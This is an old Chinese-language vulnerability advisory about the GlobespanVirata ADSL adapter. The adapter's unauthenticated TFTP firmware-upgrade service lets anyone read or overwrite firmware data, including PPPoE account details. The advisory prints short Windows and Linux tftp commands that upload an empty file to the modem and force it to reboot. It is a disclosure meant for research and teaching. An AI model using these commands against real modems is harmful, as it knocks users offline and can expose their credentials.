GlobespanVirata ADSL 远程升级服务攻击漏洞
发布日期:2003-02-28
更新日期:2003-03-03
受影响系统:GlobespanVirata ADSL TFTPD
描述:
GlobespanVirata ADSL是一款家用ADSL适配器,本身具有路由,防火墙,虚拟拨号等众多功能,支持远程TFTP对FIRMWARE软体升级。
由于GlobespanVirata ADSL的TFTPD不存在安全验证机制,导致任何网络用户可以对ADSL适配器非法上传或者下载FIRMWARE的内部数据(包括内部敏感信息,比如PPPOE帐号)。
攻击者可以远程利用TFTPD软件对ADSL适配器发送请求实现攻击。
WIN2000下
-------------------------------------
c:\echo > null.rom
tftp -i xxx.xxx.xxx.xxx put null.rom
-------------------------------------
LINUX下
firewall# echo > null.rom
tftp xxx.xxx.xxx
put null.rom
-------------------------------------
ADSL MODEM将自动重新启动
<*来源:jlwhc (
nsfocus@163.com)
链接:
http://bbs.nsfocus.net/index.php?act=ST&f=13&t=143323
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
jlwhc (
nsfocus@163.com)提供了如下测试方法:
WIN2000下
-------------------------------------
c:\echo > null.rom
tftp -i xxx.xxx.xxx.xxx put null.rom
-------------------------------------
LINUX下
firewall# echo > null.rom
tftp xxx.xxx.xxx
put null.rom
-------------------------------------
ADSL MODEM将自动重新启动
建议:
厂商补丁:
GlobespanVirata
---------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.globespan.net浏览次数:3940
严重程度:18(网友投票)
